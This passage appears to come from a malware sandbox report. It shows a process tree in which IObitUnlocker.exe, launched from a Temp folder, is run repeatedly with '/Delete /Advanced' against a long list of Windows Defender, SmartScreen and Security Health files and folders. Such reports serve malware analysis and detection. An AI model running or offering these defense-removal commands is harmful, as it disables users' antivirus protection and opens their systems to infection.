Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5396
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5508
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:3176
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:4528
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5748
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5732
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:5728
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                      • Loads dropped DLL
                                                      PID:1188
                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                      10⤵
                                                        PID:5184
                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                        10⤵
                                                          PID:5996
                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                          10⤵
                                                            PID:428
                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
